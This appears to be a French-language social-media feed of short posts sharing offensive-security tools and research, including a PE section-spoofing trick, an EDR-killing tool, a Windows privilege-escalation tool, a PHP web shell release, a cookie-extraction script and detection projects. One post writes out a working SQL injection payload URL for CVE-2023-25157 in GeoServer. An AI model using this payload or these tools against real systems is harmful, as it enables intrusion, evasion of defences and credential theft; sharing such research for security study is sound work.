Plus récents

PE with spoofed sections

An undocumented trick to embed executable code within (what appears to be) a read-only PE section. The proof-of-concepts described above involve appending the payload to the end of the NT headers, but it is also possible to embed executable code within the headers.

Nice, x86matthew. Ping @siri_urz

secret.club/2023/06/05/spoof-p

  • sample : https://secret.club/assets/pe_section_spoof/pe_section_spoof.zip

🛠 nbutools

Tools for offensive security of NetBackup infrastructures

github.com/airbus-seclab/nbuto

Terminator

Reproducing Spyboy technique to terminate all EDR/XDR/AVs processes

github.com/ZeroMemoryEx/Termin

DavRelayUp

An universal no-fix local privilege escalation in domain-joined Windows workstations where LDAP signing is not enforced

github.com/Dec0ne/DavRelayUp

PoC CVE-2023-25157 by @parzel

/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=osm:osm_places&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+current_user%29+AS+INTEGER%29%29+--+%27%29+%3D+true

ObjectWalker v2.1.6 by Rémi Gascou

module to explore the object tree to extract paths to interesting targets / objects in memory

github.com/p0dalirius/objectwa

몾 Artemis a partagé

✨️ New p0wny@shell release!

➡️ github.com/flozz/p0wny-shell

It now tries different execution functions (exec, shell_exec, system, passthru, popen, proc_open) to run commands to bypass disabled functions! 😎️

  • Process_String_Extractor.ps1

This scriplet is also able to extract Cookies for Microsoft O365 / Microsoft Azure PTC Attack

gist.github.com/LuemmelSec/3f2

​​LOLDrivers

Living Off The Land Drivers is a curated list of Microsoft Windows drivers used by adversaries

loldrivers.io

The game of chess is like a sword fight. You must think first, before you move.

hem-hashes

HIEW module to calc MD5, SHA-1 & SHA-256 hashes of a given file/block

github.com/merces/hem-hashes

Hunt-Weird-Syscalls

This project uses kernel based ETW providers to monitor for IOCs

github.com/thefLink/Hunt-Weird

Plus anciens
nanao

Comme le soleil, les machines ne se couchent jamais.